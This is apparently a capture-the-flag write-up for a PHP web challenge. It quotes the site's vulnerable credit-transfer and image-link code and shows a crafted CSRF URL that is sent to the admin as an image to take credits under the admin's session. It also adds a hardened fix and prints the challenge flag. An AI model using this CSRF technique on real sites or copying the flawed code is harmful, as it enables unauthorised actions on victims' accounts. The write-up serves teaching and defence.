Backdoor CTF 2013 Web 300

0x00 Challenge

H4x0r's website runs on credits. Earn credits for your account to get the flag; you may audit the site's source code.
Hint: the admin has a pile of credits, the question is whether you can make use of them.

0x01 Solution

Download the source code. There are not many pages, so walk through the site's functionality starting from the home page: after registering and logging in, a fresh account has 0 credits. Note the following:

```php
<?php
// Home page fragment (index.php): print a one-shot flash message if there is
// one, otherwise the current balance, and hand out the flag as soon as the
// balance is positive. $flag is defined elsewhere in the site's source.
if(@$_SESSION['flash'])
{
    echo $_SESSION['flash'];
    unset($_SESSION['flash']);
}
else
{
    echo "Welcome to Miracle. You have ".$_SESSION['credits']." credits";
}
// The only condition for the flag: more than 0 credits in the session.
if($_SESSION['credits']>0)
    echo "<br> Congrats, the flag is ".$flag;
?>
```

Any account with a credit balance greater than 0 gets the flag, and the site offers two relevant functions: sending credits to another account, and sending another account an image link:

```php
<?php
// sendcredits.php
require('secure.php');   // session, authentication and the $db (mysqli) handle come from here
// Everything is read from the query string: a plain GET changes state, and
// nothing ties the request to a form the user actually submitted (no CSRF token).
$username=$db->escape_string($_GET['username']);
$credits=(int)$db->escape_string($_GET['credits']);
//Credits has to be a positive integer
// After the (int) cast is_integer() is always true, so only the sign is checked
// (and 0 passes).
if(!is_integer($credits) || $credits<0)
{
    header("Location: error.php?error=ic");
    exit;
}
// $credis (sic) is undefined in the challenge source, so this cap never fires.
// Left as in the challenge; credits=1 is all this solution needs anyway.
if($credis>10)
{
    //You can't transfer more than 10 credits.
    header("Location: error.php?error=tc");
    exit;
}
// The sender needs strictly more credits than the amount sent; the admin has plenty.
if($_SESSION['credits']>$credits)
{
    //Transfer credits
    $db->query("UPDATE users SET credits=credits+$credits WHERE username='$username'");
    $result=$db->query("UPDATE users SET credits=credits-$credits WHERE username='{$_SESSION['username']}'");
}
else
{
    //Not enough credits
    header("Location: error.php?error=nc");
    exit;
}
if($result)
{
    $_SESSION['flash']="Credits Sent Successfully";
    header("Location: index.php");
}
else
    header("Location: error.php?error=im");
```

```php
<?php
// sendimage.php
require('secure.php');
$username=$db->escape_string($_POST['username']);   // recipient
// SQL-escaped, then tags stripped. FILTER_VALIDATE_URL only checks URL syntax:
// nothing requires the URL to point at an image, or at a host other than this site.
$url=strip_tags($db->escape_string($_POST['img_url']));
if (filter_var($url, FILTER_VALIDATE_URL) === FALSE) {
    header('Location: error.php?error=wa');
}
else{
    // Stored verbatim and later rendered into an <img src> on the recipient's home page
    $result=$db->query("INSERT INTO images VALUES ('$username','$url')");
    if($result)
    {
        $_SESSION['flash']="Image Sent Successfully";
        header("Location: index.php");
    }
    else
        header("Location: error.php?error=im");
}
```

After logging in, a user's home page displays the image links other users have sent them:

```php
<!-- login_form.html: the logged-in user's home page. $images is the result set
     of rows from the images table addressed to this user, fetched elsewhere. -->
<div class="span12">
<h2>Images sent to you </h2>
<?php
while($row=$images->fetch_assoc())
{
    // The stored URL goes straight into an <img src>: the viewer's browser
    // requests it automatically, attaching the viewer's own session cookie.
    echo "<img src='{$row['url']}'><br>";
}
?>
</div>
```

Putting the hint together with the code: the credit transfer is a state-changing GET request with no CSRF token (nothing proves the logged-in user intended it), and URLs received from other users are trusted completely, with no check on where they point. So this code-audit challenge is really about CSRF. All we need is to craft a URL like:

http://backdoor-problems.cognizance.org.in/web300/sendcredits.php?credits=1&username=OUR_USERNAME

where OUR_USERNAME is our own account name, and send it to admin through the send-image function. When the admin next opens the home page, the browser automatically requests the "image link" as the src of the <img> tag, with the admin's session cookie attached, so sendcredits.php runs our payload under the admin's session and one credit lands in our account.
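The fix follows from the two gaps named above. Below is a hardened sendcredits.php, added here as an example; it is neither the challenge's code nor part of the original writeup. It assumes, as the original does, that secure.php starts the session, authenticates the user and provides $db as a mysqli connection. The csrf_token() helper, the 'csrf_token' hidden field name and the bare 405/403 responses are this example's own choices; the error.php codes it reuses (tc, nc, im) are the originals.

```php
<?php
// Hardened sendcredits.php (added example, not the challenge's code).
// Assumes secure.php starts the session, logs the user in and sets $db (mysqli),
// exactly as the original does. csrf_token() and the 'csrf_token' field name
// are this example's own.
require('secure.php');

// Per-session synchroniser token. The page that renders the send-credits form
// calls this and embeds the value as <input type="hidden" name="csrf_token">.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// 1. State changes only via POST. An <img src> can only ever issue a GET, so
//    the image-link feature alone can no longer trigger a transfer.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}

// 2. The request must carry the session's token, compared in constant time.
//    A request forged from another origin cannot know or read it.
$sent = $_POST['csrf_token'] ?? '';
if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
    http_response_code(403);
    exit;
}

// 3. Validate the amount as an integer in 1..10: no (int) cast that turns
//    garbage into 0, and the 10-credit cap actually applies.
$username = (string)($_POST['username'] ?? '');
$credits  = filter_var($_POST['credits'] ?? '', FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1, 'max_range' => 10]]);
if ($credits === false) {
    header("Location: error.php?error=tc");   // original error code
    exit;
}

// 4. Debit and credit in one transaction, deciding on the stored balance rather
//    than on a possibly stale $_SESSION['credits'], with prepared statements
//    instead of string-built SQL.
$sender = $_SESSION['username'];
$db->begin_transaction();

$debit = $db->prepare("UPDATE users SET credits = credits - ? WHERE username = ? AND credits >= ?");
$debit->bind_param('isi', $credits, $sender, $credits);
$debit->execute();
if ($debit->affected_rows !== 1) {            // not enough credits
    $db->rollback();
    header("Location: error.php?error=nc");
    exit;
}

$credit = $db->prepare("UPDATE users SET credits = credits + ? WHERE username = ?");
$credit->bind_param('is', $credits, $username);
$credit->execute();
if ($credit->affected_rows !== 1) {           // unknown recipient
    $db->rollback();
    header("Location: error.php?error=im");
    exit;
}

$db->commit();
$_SESSION['credits'] -= $credits;
$_SESSION['flash'] = "Credits Sent Successfully";
header("Location: index.php");
exit;
```

With this in place the payload URL above is still fetched by the admin's browser, but the GET is rejected before any balance changes, and a forged POST from an attacker-controlled page fails the token check because that page cannot read the admin's session token. Moving the balance check into the UPDATE's WHERE clause also closes the window in which two concurrent transfers could both pass the old `$_SESSION['credits']>$credits` test.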

Result:

Welcome to Miracle. You have 1 credits
Congrats, the flag is d50ccf35a71566b5269d9a6896547a28